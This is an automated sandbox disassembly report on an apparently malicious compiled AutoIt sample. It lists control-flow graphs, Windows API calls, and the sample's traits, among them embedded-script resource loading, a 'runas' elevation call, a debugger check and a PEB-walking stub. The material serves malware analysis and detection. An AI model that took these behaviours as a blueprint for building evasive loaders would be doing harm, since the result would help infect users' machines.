100194 e136e5 100155->100194 100159 e4d31c 100156->100159 100160 e136ed 100156->100160 100161 e13695 100157->100161 100162 e1375d PostQuitMessage 100157->100162 100158 e136ca DefWindowProcW 100196 e136d8 100158->100196 100204 e211d0 10 API calls Mailbox 100159->100204 100163 e136f2 100160->100163 100164 e13715 SetTimer RegisterWindowMessageW 100160->100164 100165 e136a0 100161->100165 100166 e4d38f 100161->100166 100162->100196 100168 e136f9 KillTimer 100163->100168 100169 e4d2bf 100163->100169 100170 e1373e CreatePopupMenu 100164->100170 100164->100196 100171 e13767 100165->100171 100172 e136a8 100165->100172 100208 e72a16 71 API calls _memset 100166->100208 100199 e144cb Shell_NotifyIconW _memset 100168->100199 100176 e4d2c4 100169->100176 100177 e4d2f8 MoveWindow 100169->100177 100170->100196 100202 e14531 64 API calls _memset 100171->100202 100179 e4d374 100172->100179 100180 e136b3 100172->100180 100174 e4d343 100205 e211f3 341 API calls Mailbox 100174->100205 100185 e4d2e7 SetFocus 100176->100185 100186 e4d2c8 100176->100186 100177->100196 100179->100158 100207 e6817e 59 API calls Mailbox 100179->100207 100183 e136be 100180->100183 100188 e1374b 100180->100188 100181 e4d3a1 100181->100158 100181->100196 100183->100158 100206 e144cb Shell_NotifyIconW _memset 100183->100206 100184 e1375b 100184->100196 100185->100196 100186->100183 100189 e4d2d1 100186->100189 100187 e1370c 100200 e13114 DeleteObject DestroyWindow Mailbox 100187->100200 100201 e145df 81 API calls _memset 100188->100201 100203 e211d0 10 API calls Mailbox 100189->100203 100194->100158 100197 e4d368 100198 e143db 68 API calls 100197->100198 100198->100194 100199->100187 100200->100196 100201->100184 100202->100184 100203->100196 100204->100174 100205->100183 100206->100197 100207->100194 100208->100181 100209 e4ff06 100210 e4ff10 100209->100210 100225 e1ac90 Mailbox _memmove 100209->100225 100410 e18e34 59 API calls Mailbox 100210->100410 100211 e30ff6 59 API calls Mailbox 100211->100225 100218 
e1b5d5 100222 e181a7 59 API calls 100218->100222 100219 e1a6ba 100418 e7a0b5 89 API calls 4 library calls 100219->100418 100220 e1a1b7 100221 e30ff6 59 API calls Mailbox 100235 e1a097 Mailbox 100221->100235 100222->100220 100223 e5047f 100414 e7a0b5 89 API calls 4 library calls 100223->100414 100224 e1b5da 100420 e7a0b5 89 API calls 4 library calls 100224->100420 100225->100211 100225->100220 100230 e17f41 59 API calls 100225->100230 100231 e1b685 100225->100231 100225->100235 100241 e8bf80 341 API calls 100225->100241 100243 e1b416 100225->100243 100244 e1a000 341 API calls 100225->100244 100246 e50c94 100225->100246 100248 e50ca2 100225->100248 100251 e1b37c 100225->100251 100258 e1ade2 Mailbox 100225->100258 100363 e8c5f4 100225->100363 100395 e77be0 100225->100395 100401 e666f4 100225->100401 100411 e67405 59 API calls 100225->100411 100412 e8c4a7 85 API calls 2 library calls 100225->100412 100227 e181a7 59 API calls 100227->100235 100230->100225 100415 e7a0b5 89 API calls 4 library calls 100231->100415 100232 e177c7 59 API calls 100232->100235 100233 e67405 59 API calls 100233->100235 100234 e5048e 100235->100218 100235->100219 100235->100220 100235->100221 100235->100223 100235->100224 100235->100227 100235->100232 100235->100233 100238 e50e00 100235->100238 100240 e32f80 67 API calls __cinit 100235->100240 100404 e1ca20 341 API calls 2 library calls 100235->100404 100405 e1ba60 60 API calls Mailbox 100235->100405 100237 e666f4 Mailbox 59 API calls 100237->100220 100419 e7a0b5 89 API calls 4 library calls 100238->100419 100240->100235 100241->100225 100409 e1f803 341 API calls 100243->100409 100244->100225 100416 e19df0 59 API calls Mailbox 100246->100416 100417 e7a0b5 89 API calls 4 library calls 100248->100417 100250 e50c86 100250->100220 100250->100237 100407 e19e9c 60 API calls Mailbox 100251->100407 100253 e1b38d 100408 e19e9c 60 API calls Mailbox 100253->100408 100258->100220 100258->100231 100258->100250 100259 e500e0 VariantClear 100258->100259 100264 
e22123 100258->100264 100304 e7d2e6 100258->100304 100351 e8e237 100258->100351 100354 e8474d 100258->100354 100406 e19df0 59 API calls Mailbox 100258->100406 100413 e67405 59 API calls 100258->100413 100259->100258 100421 e19bf8 100264->100421 100268 e30ff6 Mailbox 59 API calls 100269 e22154 100268->100269 100271 e22164 100269->100271 100449 e15906 60 API calls Mailbox 100269->100449 100274 e19997 84 API calls 100271->100274 100272 e569af 100273 e22189 100272->100273 100453 e7f7df 59 API calls 100272->100453 100279 e22196 100273->100279 100454 e19c9c 59 API calls 100273->100454 100276 e22172 100274->100276 100278 e15956 67 API calls 100276->100278 100277 e569f7 100277->100279 100280 e569ff 100277->100280 100281 e22181 100278->100281 100282 e15e3f 2 API calls 100279->100282 100455 e19c9c 59 API calls 100280->100455 100281->100272 100281->100273 100452 e15a1a CloseHandle 100281->100452 100285 e2219d 100282->100285 100286 e56a11 100285->100286 100287 e221b7 100285->100287 100289 e30ff6 Mailbox 59 API calls 100286->100289 100288 e177c7 59 API calls 100287->100288 100290 e221bf 100288->100290 100291 e56a17 100289->100291 100434 e156d2 100290->100434 100293 e56a2b 100291->100293 100456 e159b0 ReadFile SetFilePointerEx 100291->100456 100298 e56a2f _memmove 100293->100298 100457 e7794e 59 API calls 2 library calls 100293->100457 100296 e221ce 100296->100298 100450 e19b9c 59 API calls Mailbox 100296->100450 100299 e221e2 Mailbox 100300 e2221c 100299->100300 100301 e15dcf CloseHandle 100299->100301 100300->100258 100302 e22210 100301->100302 100302->100300 100451 e15a1a CloseHandle 100302->100451 100305 e7d310 100304->100305 100306 e7d305 100304->100306 100309 e177c7 59 API calls 100305->100309 100349 e7d3ea Mailbox 100305->100349 100495 e19c9c 59 API calls 100306->100495 100308 e30ff6 Mailbox 59 API calls 100310 e7d433 100308->100310 100311 e7d334 100309->100311 100312 e7d43f 100310->100312 100498 e15906 60 API calls Mailbox 100310->100498 100313 e177c7 59 API calls 
100311->100313 100315 e19997 84 API calls 100312->100315 100316 e7d33d 100313->100316 100317 e7d457 100315->100317 100318 e19997 84 API calls 100316->100318 100319 e15956 67 API calls 100317->100319 100320 e7d349 100318->100320 100321 e7d466 100319->100321 100322 e146f9 59 API calls 100320->100322 100323 e7d49e 100321->100323 100324 e7d46a GetLastError 100321->100324 100325 e7d35e 100322->100325 100328 e7d500 100323->100328 100329 e7d4c9 100323->100329 100326 e7d483 100324->100326 100327 e17c8e 59 API calls 100325->100327 100348 e7d3f3 Mailbox 100326->100348 100499 e15a1a CloseHandle 100326->100499 100330 e7d391 100327->100330 100333 e30ff6 Mailbox 59 API calls 100328->100333 100331 e30ff6 Mailbox 59 API calls 100329->100331 100332 e7d3e3 100330->100332 100337 e73e73 3 API calls 100330->100337 100334 e7d4ce 100331->100334 100497 e19c9c 59 API calls 100332->100497 100338 e7d505 100333->100338 100339 e7d4df 100334->100339 100342 e177c7 59 API calls 100334->100342 100340 e7d3a1 100337->100340 100341 e177c7 59 API calls 100338->100341 100338->100348 100500 e7f835 59 API calls 2 library calls 100339->100500 100340->100332 100343 e7d3a5 100340->100343 100341->100348 100342->100339 100345 e17f41 59 API calls 100343->100345 100346 e7d3b2 100345->100346 100496 e73c66 63 API calls Mailbox 100346->100496 100348->100258 100349->100308 100349->100348 100350 e7d3bb Mailbox 100350->100332 100352 e8cdf1 130 API calls 100351->100352 100353 e8e247 100352->100353 100353->100258 100355 e19997 84 API calls 100354->100355 100356 e84787 100355->100356 100357 e163a0 94 API calls 100356->100357 100358 e84797 100357->100358 100359 e847bc 100358->100359 100360 e1a000 341 API calls 100358->100360 100361 e19bf8 59 API calls 100359->100361 100362 e847c0 100359->100362 100360->100359 100361->100362 100362->100258 100364 e177c7 59 API calls 100363->100364 100365 e8c608 100364->100365 100366 e177c7 59 API calls 100365->100366 100367 e8c610 100366->100367 100368 e177c7 59 API calls 100367->100368 
100369 e8c618 100368->100369 100370 e19997 84 API calls 100369->100370 100371 e8c626 100370->100371 100372 e8c83c Mailbox 100371->100372 100373 e17d2c 59 API calls 100371->100373 100374 e8c80f 100371->100374 100375 e8c7f6 100371->100375 100377 e8c811 100371->100377 100378 e181a7 59 API calls 100371->100378 100380 e17a84 59 API calls 100371->100380 100385 e17faf 59 API calls 100371->100385 100387 e17faf 59 API calls 100371->100387 100392 e19997 84 API calls 100371->100392 100393 e17e0b 59 API calls 100371->100393 100394 e17c8e 59 API calls 100371->100394 100372->100225 100373->100371 100374->100372 100503 e19b9c 59 API calls Mailbox 100374->100503 100379 e17e0b 59 API calls 100375->100379 100381 e17e0b 59 API calls 100377->100381 100378->100371 100382 e8c803 100379->100382 100380->100371 100384 e8c820 100381->100384 100383 e17c8e 59 API calls 100382->100383 100383->100374 100386 e17c8e 59 API calls 100384->100386 100388 e8c6bd CharUpperBuffW 100385->100388 100386->100374 100389 e8c77d CharUpperBuffW 100387->100389 100501 e1859a 68 API calls 100388->100501 100502 e1c707 69 API calls 2 library calls 100389->100502 100392->100371 100393->100371 100394->100371 100396 e77bec 100395->100396 100397 e30ff6 Mailbox 59 API calls 100396->100397 100398 e77bfa 100397->100398 100399 e77c08 100398->100399 100400 e177c7 59 API calls 100398->100400 100399->100225 100400->100399 100504 e66636 100401->100504 100403 e66702 100403->100225 100404->100235 100405->100235 100406->100258 100407->100253 100408->100243 100409->100231 100410->100225 100411->100225 100412->100225 100413->100258 100414->100234 100415->100250 100416->100250 100417->100250 100418->100220 100419->100224 100420->100220 100422 e19c08 100421->100422 100423 e4fbff 100421->100423 100428 e30ff6 Mailbox 59 API calls 100422->100428 100424 e4fc10 100423->100424 100425 e17d2c 59 API calls 100423->100425 100426 e17eec 59 API calls 100424->100426 100425->100424 100427 e4fc1a 100426->100427 100431 e177c7 59 API calls 
100427->100431 100433 e19c34 100427->100433 100429 e19c1b 100428->100429 100429->100427 100430 e19c26 100429->100430 100432 e17f41 59 API calls 100430->100432 100430->100433 100431->100433 100432->100433 100433->100268 100433->100272 100435 e15702 100434->100435 100436 e156dd 100434->100436 100437 e17eec 59 API calls 100435->100437 100436->100435 100440 e156ec 100436->100440 100441 e7349a 100437->100441 100438 e734c9 100438->100296 100460 e15c18 100440->100460 100441->100438 100458 e73436 ReadFile SetFilePointerEx 100441->100458 100459 e17a84 59 API calls 2 library calls 100441->100459 100448 e735d8 Mailbox 100448->100296 100449->100271 100450->100299 100451->100300 100452->100272 100453->100272 100454->100277 100455->100285 100456->100293 100457->100298 100458->100441 100459->100441 100461 e30ff6 Mailbox 59 API calls 100460->100461 100462 e15c2b 100461->100462 100463 e30ff6 Mailbox 59 API calls 100462->100463 100464 e15c37 100463->100464 100465 e15632 100464->100465 100472 e15a2f 100465->100472 100467 e15674 100467->100448 100471 e1793a 61 API calls Mailbox 100467->100471 100468 e15d20 2 API calls 100469 e15643 100468->100469 100469->100467 100469->100468 100479 e15bda 100469->100479 100471->100448 100473 e4e065 100472->100473 100474 e15a40 100472->100474 100488 e66443 59 API calls Mailbox 100473->100488 100474->100469 100476 e4e06f 100477 e30ff6 Mailbox 59 API calls 100476->100477 100478 e4e07b 100477->100478 100480 e4e117 100479->100480 100481 e15bee 100479->100481 100494 e66443 59 API calls Mailbox 100480->100494 100489 e15b19 100481->100489 100484 e15bfa 100484->100469 100485 e4e122 100486 e30ff6 Mailbox 59 API calls 100485->100486 100487 e4e137 _memmove 100486->100487 100488->100476 100490 e15b31 100489->100490 100493 e15b2a _memmove 100489->100493 100491 e30ff6 Mailbox 59 API calls 100490->100491 100492 e4e0a7 100490->100492 100491->100493 100493->100484 100494->100485 100495->100305 100496->100350 100497->100349 100498->100312 100499->100348 100500->100348 
100501->100371 100502->100371 100503->100372 100505 e6665e 100504->100505 100506 e66641 100504->100506 100505->100403 100506->100505 100508 e66621 59 API calls Mailbox 100506->100508 100508->100506 100509 e50226 100518 e1ade2 Mailbox 100509->100518 100510 e1b6c1 100525 e7a0b5 89 API calls 4 library calls 100510->100525 100512 e50c86 100513 e666f4 Mailbox 59 API calls 100512->100513 100514 e50c8f 100513->100514 100516 e500e0 VariantClear 100516->100518 100518->100510 100518->100512 100518->100514 100518->100516 100519 e7d2e6 101 API calls 100518->100519 100520 e22123 95 API calls 100518->100520 100521 e8474d 341 API calls 100518->100521 100522 e8e237 130 API calls 100518->100522 100523 e19df0 59 API calls Mailbox 100518->100523 100524 e67405 59 API calls 100518->100524 100519->100518 100520->100518 100521->100518 100522->100518 100523->100518 100524->100518 100525->100512 100526 e11055 100531 e12649 100526->100531 100529 e32f80 __cinit 67 API calls 100530 e11064 100529->100530 100532 e177c7 59 API calls 100531->100532 100533 e126b7 100532->100533 100538 e13582 100533->100538 100536 e12754 100537 e1105a 100536->100537 100541 e13416 59 API calls 2 library calls 100536->100541 100537->100529 100542 e135b0 100538->100542 100541->100536 100543 e135bd 100542->100543 100544 e135a1 100542->100544 100543->100544 100545 e135c4 RegOpenKeyExW 100543->100545 100544->100536 100545->100544 100546 e135de RegQueryValueExW 100545->100546 100547 e13614 RegCloseKey 100546->100547 100548 e135ff 100546->100548 100547->100544 100548->100547 100549 d423b0 100563 d40000 100549->100563 100551 d42442 100566 d422a0 100551->100566 100569 d43470 GetPEB 100563->100569 100565 d4068b 100565->100551 100567 d422a9 Sleep 100566->100567 100568 d422b7 100567->100568 100570 d4349a 100569->100570 100570->100565 100571 e11066 100576 e1f8cf 100571->100576 100573 e1106c 100574 e32f80 __cinit 67 API calls 100573->100574 100575 e11076 100574->100575 100577 e1f8f0 100576->100577 100609 e30143 100577->100609 
100581 e1f937 100582 e177c7 59 API calls 100581->100582 100583 e1f941 100582->100583 100584 e177c7 59 API calls 100583->100584 100585 e1f94b 100584->100585 100586 e177c7 59 API calls 100585->100586 100587 e1f955 100586->100587 100588 e177c7 59 API calls 100587->100588 100589 e1f993 100588->100589 100590 e177c7 59 API calls 100589->100590 100591 e1fa5e 100590->100591 100619 e260e7 100591->100619 100595 e1fa90 100596 e177c7 59 API calls 100595->100596 100597 e1fa9a 100596->100597 100647 e2ffde 100597->100647 100599 e1fae1 100600 e1faf1 GetStdHandle 100599->100600 100601 e549d5 100600->100601 100602 e1fb3d 100600->100602 100601->100602 100604 e549de 100601->100604 100603 e1fb45 OleInitialize 100602->100603 100603->100573 100654 e76dda 64 API calls Mailbox 100604->100654 100606 e549e5 100655 e774a9 CreateThread 100606->100655 100608 e549f1 CloseHandle 100608->100603 100656 e3021c 100609->100656 100612 e3021c 59 API calls 100613 e30185 100612->100613 100614 e177c7 59 API calls 100613->100614 100615 e30191 100614->100615 100616 e17d2c 59 API calls 100615->100616 100617 e1f8f6 100616->100617 100618 e303a2 6 API calls 100617->100618 100618->100581 100620 e177c7 59 API calls 100619->100620 100621 e260f7 100620->100621 100622 e177c7 59 API calls 100621->100622 100623 e260ff 100622->100623 100663 e25bfd 100623->100663 100626 e25bfd 59 API calls 100627 e2610f 100626->100627 100628 e177c7 59 API calls 100627->100628 100629 e2611a 100628->100629 100630 e30ff6 Mailbox 59 API calls 100629->100630 100631 e1fa68 100630->100631 100632 e26259 100631->100632 100633 e26267 100632->100633 100634 e177c7 59 API calls 100633->100634 100635 e26272 100634->100635 100636 e177c7 59 API calls 100635->100636 100637 e2627d 100636->100637 100638 e177c7 59 API calls 100637->100638 100639 e26288 100638->100639 100640 e177c7 59 API calls 100639->100640 100641 e26293 100640->100641 100642 e25bfd 59 API calls 100641->100642 100643 e2629e 100642->100643 100644 e30ff6 Mailbox 59 API calls 100643->100644 
                                            [Control-flow graph edge listing (continued, not reproduced): nodes reference RegisterWindowMessageW, GetVersionExW, GetCurrentProcess/IsWow64Process, GetSystemInfo/GetNativeSystemInfo, LoadLibraryA/GetProcAddress/FreeLibrary, RegOpenKeyExW/RegQueryValueExW/RegCloseKey and GetFullPathNameW]

                                            Control-flow Graph

                                            APIs
                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E13B7A
                                            • IsDebuggerPresent.KERNEL32 ref: 00E13B8C
                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,00ED62F8,00ED62E0,?,?), ref: 00E13BFD
                                              • Part of subcall function 00E17D2C: _memmove.LIBCMT ref: 00E17D66
                                              • Part of subcall function 00E20A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E13C26,00ED62F8,?,?,?), ref: 00E20ACE
                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00E13C81
                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00EC93F0,00000010), ref: 00E4D4BC
                                            • SetCurrentDirectoryW.KERNEL32(?,00ED62F8,?,?,?), ref: 00E4D4F4
                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00EC5D40,00ED62F8,?,?,?), ref: 00E4D57A
                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 00E4D581
                                              • Part of subcall function 00E13A58: GetSysColorBrush.USER32(0000000F), ref: 00E13A62
                                              • Part of subcall function 00E13A58: LoadCursorW.USER32(00000000,00007F00), ref: 00E13A71
                                              • Part of subcall function 00E13A58: LoadIconW.USER32(00000063), ref: 00E13A88
                                              • Part of subcall function 00E13A58: LoadIconW.USER32(000000A4), ref: 00E13A9A
                                              • Part of subcall function 00E13A58: LoadIconW.USER32(000000A2), ref: 00E13AAC
                                              • Part of subcall function 00E13A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E13AD2
                                              • Part of subcall function 00E13A58: RegisterClassExW.USER32(?), ref: 00E13B28
                                              • Part of subcall function 00E139E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E13A15
                                              • Part of subcall function 00E139E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E13A36
                                              • Part of subcall function 00E139E7: ShowWindow.USER32(00000000,?,?), ref: 00E13A4A
                                              • Part of subcall function 00E139E7: ShowWindow.USER32(00000000,?,?), ref: 00E13A53
                                              • Part of subcall function 00E143DB: _memset.LIBCMT ref: 00E14401
                                              • Part of subcall function 00E143DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E144A6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                            • String ID: This is a third-party compiled AutoIt script.$runas$%
                                            • API String ID: 529118366-3343222573
                                            • Opcode ID: 45ad467af04a9b953a1e595ffa6efb226095095d5b2767e9922fd2e3696bf9ba
                                            • Instruction ID: dcb3deff507db5a2ca50844901e9f0ecb9f52d0dc526809069a138b34a65acdb
                                            • Opcode Fuzzy Hash: 45ad467af04a9b953a1e595ffa6efb226095095d5b2767e9922fd2e3696bf9ba
                                            • Instruction Fuzzy Hash: 21511D70904248AECF11EBB5EC06EEDBBB5EF45704F006167F461B22B2DB74468ACB61

                                            Control-flow Graph

                                            [Control-flow graph (edge list not reproduced): e14fe9 CreateStreamOnHGlobal -> e15003 FindResourceExW -> e4dd5c LoadResource -> e4dd71 SizeofResource -> e4dd85 LockResource -> e4dd96; each failure branch returns via e15020 to e15021]
                                            APIs
                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00E14EEE,?,?,00000000,00000000), ref: 00E14FF9
                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E14EEE,?,?,00000000,00000000), ref: 00E15010
                                            • LoadResource.KERNEL32(?,00000000,?,?,00E14EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E14F8F), ref: 00E4DD60
                                            • SizeofResource.KERNEL32(?,00000000,?,?,00E14EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E14F8F), ref: 00E4DD75
                                            • LockResource.KERNEL32(N,?,?,00E14EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E14F8F,00000000), ref: 00E4DD88
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                            • String ID: SCRIPT$N
                                            • API String ID: 3051347437-3852340653
                                            • Opcode ID: 539ad1e65c798e201ce57bf978d0969db94f374d26fafee0a8d7cf2e05be2a57
                                            • Instruction ID: 9b3a6865f7467b190613757fd0c3707fa126013c5cfe0c49d2f94b8bf707ce01
                                            • Opcode Fuzzy Hash: 539ad1e65c798e201ce57bf978d0969db94f374d26fafee0a8d7cf2e05be2a57
                                            • Instruction Fuzzy Hash: E0117075200700BFD7218B66DC58FA77BBAEBC9B11F20456EF405E6260DB71EC448660

                                            Control-flow Graph

                                            [Control-flow graph (edge list not reproduced): e14afe calls e177c7, GetVersionExW, e17d2c; e14b73 calls e17e8c and e17886; e14bf1 GetCurrentProcess/IsWow64Process; e14c20 and e14c32 call e14c95; e14c41 GetNativeSystemInfo; e14c4d FreeLibrary; e14c7d and e14c89 GetSystemInfo; all paths converge at e14c56]
                                            APIs
                                            • GetVersionExW.KERNEL32(?), ref: 00E14B2B
                                              • Part of subcall function 00E17D2C: _memmove.LIBCMT ref: 00E17D66
                                            • GetCurrentProcess.KERNEL32(?,00E9FAEC,00000000,00000000,?), ref: 00E14BF8
                                            • IsWow64Process.KERNEL32(00000000), ref: 00E14BFF
                                            • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00E14C45
                                            • FreeLibrary.KERNEL32(00000000), ref: 00E14C50
                                            • GetSystemInfo.KERNEL32(00000000), ref: 00E14C81
                                            • GetSystemInfo.KERNEL32(00000000), ref: 00E14C8D
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                            • String ID:
                                            • API String ID: 1986165174-0
                                            • Opcode ID: caa33cf056423117e2a895b5b6c8eae1b7bb7b0ef351e642c0f8654e72490b8f
                                            • Instruction ID: 950dad286685b7741ae2f6b76e9691b941394fba5fdc57f50453ff5e7ad36036
                                            • Opcode Fuzzy Hash: caa33cf056423117e2a895b5b6c8eae1b7bb7b0ef351e642c0f8654e72490b8f
                                            • Instruction Fuzzy Hash: DB91C47154EBC4DEC731CB6894915EAFFE4AF26304B485D9ED0CBA3B41D220E988C759
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Dt$Dt$Dt$Dt$Variable must be of type 'Object'.
                                            • API String ID: 0-3952547859
                                            • Opcode ID: f467e89da1f964772bcba8f56b6775421f57257ede619b774bf3de4504106f8f
                                            • Instruction ID: bf363ab7efbfbdbc0720407961811d0e22b8831ea5aa079e9adcb21055b7fd19
                                            • Opcode Fuzzy Hash: f467e89da1f964772bcba8f56b6775421f57257ede619b774bf3de4504106f8f
                                            • Instruction Fuzzy Hash: A6A25A74A04205CFCB24CF54C880AE9B7B2FF48308F689469ED56BB351D771AD86CB91
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,00E4E7C1), ref: 00E746A6
                                            • FindFirstFileW.KERNELBASE(?,?), ref: 00E746B7
                                            • FindClose.KERNEL32(00000000), ref: 00E746C7
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: FileFind$AttributesCloseFirst
                                            • String ID:
                                            • API String ID: 48322524-0
                                            • Opcode ID: ad2ecd34260a03a2c47039c122b1195cc4fbc20dc3798d54fe4b867fc2edece3
                                            • Instruction ID: edbcec0bd68d0d57b0d1435aa32429a3fe8406560a8da48f82396dcc9acf453d
                                            • Opcode Fuzzy Hash: ad2ecd34260a03a2c47039c122b1195cc4fbc20dc3798d54fe4b867fc2edece3
                                            • Instruction Fuzzy Hash: CCE0D8B14104005F4610A778EC4D8EA775C9F06335F104717F839E10F0E7B059548695
                                            APIs
                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E20BBB
                                            • timeGetTime.WINMM ref: 00E20E76
                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E20FB3
                                            • TranslateMessage.USER32(?), ref: 00E20FC7
                                            • DispatchMessageW.USER32(?), ref: 00E20FD5
                                            • Sleep.KERNEL32(0000000A), ref: 00E20FDF
                                            • LockWindowUpdate.USER32(00000000,?,?), ref: 00E2105A
                                            • DestroyWindow.USER32 ref: 00E21066
                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E21080
                                            • Sleep.KERNEL32(0000000A,?,?), ref: 00E552AD
                                            • TranslateMessage.USER32(?), ref: 00E5608A
                                            • DispatchMessageW.USER32(?), ref: 00E56098
                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E560AC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pr$pr$pr$pr
                                            • API String ID: 4003667617-1825247661
                                            • Opcode ID: fca782ca98d701e9422eac8deb916c5d934c448ac28fbb271ec9b080cd484d72
                                            • Instruction ID: f810b3fb553b487fd2e95feef6f74f68355eead92365feaec341988ac48ece40
                                            • Opcode Fuzzy Hash: fca782ca98d701e9422eac8deb916c5d934c448ac28fbb271ec9b080cd484d72
